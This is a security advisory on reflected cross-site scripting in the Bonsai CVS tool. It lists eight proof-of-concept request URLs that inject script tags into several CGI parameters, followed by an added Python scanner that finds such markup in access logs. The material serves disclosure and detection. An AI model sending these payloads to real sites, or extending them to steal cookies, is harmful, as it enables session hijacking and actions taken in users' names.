source: https://www.securityfocus.com/bid/5516/info
Multiple cross site scripting vulnerabilities have been reported for the Bonsai tool.
An attacker may exploit this vulnerability by causing a victim user to follow a malicious link. Attacker-supplied code may execute within the context of the site hosting the vulnerable software when the malicious link is visited.
This type of vulnerability may be used to steal cookies or perform other web-based attacks. It may be possible to take actions as a user of the Bonsai system.
/webtools/bonsai/cvslog.cgi?file=*&rev=&root=<script>alert(document.domain)</script>
/webtools/bonsai/cvslog.cgi?file=<script>alert(document.domain)</script>
/webtools/bonsai/cvsblame.cgi?file=/index.html&root=<script>alert(document.domain)</script>
/webtools/bonsai/cvsblame.cgi?file=<script>alert(document.domain)</script>
/cvsquery.cgi?branch=<script>alert(document.domain)</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
/cvsquery.cgi?module=<script>alert(document.domain)</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
/showcheckins.cgi?person=<script>alert(document.domain)</script>
/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert(document.domain)</script>&branch=HEAD
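
Added example, not part of the original advisory or of Bonsai: a log check that flags requests to the scripts listed above when one of the listed parameters carries HTML markup, including percent-encoded and double-encoded forms. It assumes Apache-style access log lines; the function names, the markup character set, the decode depth and the sample log are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Scripts and parameters named in the request list above.
WATCHED = {
    "cvslog.cgi": {"file", "root"},
    "cvsblame.cgi": {"file", "root"},
    "cvsquery.cgi": {"branch", "file", "date", "module", "who"},
    "showcheckins.cgi": {"person"},
    "cvsqueryform.cgi": {"module"},
}
# Assumed character set: what lets a reflected value leave HTML text or an attribute.
MARKUP = re.compile(r"[<>\"']")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded markup is still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(uri):
    """Return the watched parameters of a request URI whose values carry markup."""
    parts = urlsplit(uri)
    watched = WATCHED.get(parts.path.rsplit("/", 1)[-1], set())
    return sorted({name for name, value in parse_qsl(parts.query, keep_blank_values=True)
                   if name in watched and MARKUP.search(decode(value))})

def scan(log_lines):
    """Yield (uri, parameter names) for each access-log line that matches."""
    for line in log_lines:
        match = REQUEST.search(line)
        hits = suspicious_params(match.group(1)) if match else []
        if hits:
            yield match.group(1), hits

# Constructed sample log (documentation addresses), not taken from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /webtools/bonsai/cvslog.cgi?file=/index.html&root=/cvsroot HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /webtools/bonsai/cvsblame.cgi?file=/index.html&root=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 200 812',
    '192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET /cvsquery.cgi?branch=%253Cscript%253E&file=&date=week HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    for uri, names in scan(SAMPLE_LOG):
        print(names, uri)
```

A hit only shows that markup was sent to one of these parameters; whether it was reflected unescaped depends on the Bonsai version that served the request.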